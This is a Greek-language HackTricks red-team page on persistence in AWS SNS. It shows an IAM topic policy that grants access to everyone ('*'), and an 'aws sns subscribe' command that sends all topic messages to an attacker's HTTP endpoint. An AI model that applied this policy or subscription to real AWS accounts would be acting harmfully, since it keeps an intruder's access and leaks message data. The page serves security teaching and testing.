AWS - SNS Persistence

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

SNS

Για περισσότερες πληροφορίες, ελέγξτε:

AWS - SNS Enum

Μόνιμη Αποθήκευση

Όταν δημιουργείτε ένα θέμα SNS πρέπει να υποδείξετε με μια πολιτική IAM ποιος έχει πρόσβαση για ανάγνωση και εγγραφή. Είναι δυνατόν να υποδείξετε εξωτερικούς λογαριασμούς, ARN ρόλων ή ακόμα και "*". Η παρακάτω πολιτική δίνει σε όλους στο AWS πρόσβαση για ανάγνωση και εγγραφή στο θέμα SNS με το όνομα MySNS.fifo:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

Δημιουργία Συνδρομητών

Για να συνεχίσει να εξαγάγει όλα τα μηνύματα από όλα τα θέματα, ο επιτιθέμενος μπορεί να δημιουργήσει συνδρομητές για όλα τα θέματα.

Σημείωση ότι αν το θέμα είναι τύπου FIFO, μόνο οι συνδρομητές που χρησιμοποιούν το πρωτόκολλο SQS μπορούν να χρησιμοποιηθούν.

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Last updated